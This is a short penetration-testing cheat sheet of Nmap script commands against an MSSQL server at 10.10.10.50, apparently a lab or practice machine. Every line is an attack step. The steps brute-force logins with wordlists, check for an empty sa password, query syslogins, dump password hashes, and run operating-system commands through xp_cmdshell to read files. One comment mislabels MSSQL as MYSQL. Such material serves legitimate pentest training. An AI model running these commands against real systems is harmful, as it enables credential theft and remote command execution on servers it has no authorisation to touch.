Run Nmap scripts to enumerate the Windows target machine MSSQL service.
nmap -p1433 --script ms-sql-info 10.10.10.50 #get MYSQL info;
nmap -p1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 10.10.10.50 #check NTLM auth;
nmap -p1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/common_password.txt 10.10.10.50 #bruteforce SQL username/password;
nmap -p1433 --script ms-sql-empty-password 10.10.10.50 #check if sa has empty password;
nmap -p1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=valid_password,ms-sql-query.query="SELECT * FROM master..syslogins" 10.10.10.50 -oN output.txt #all user login;
nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=valid_password 10.10.10.50 #all user hashes;
nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=valid_password,ms-sql-xp-cmdshell.cmd="ipconfig" 10.10.10.50 #execute ipconfig command
nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=valid_password,ms-sql-xp-cmdshell.cmd="type c:\file_to_read_from" 10.10.10.50 #read file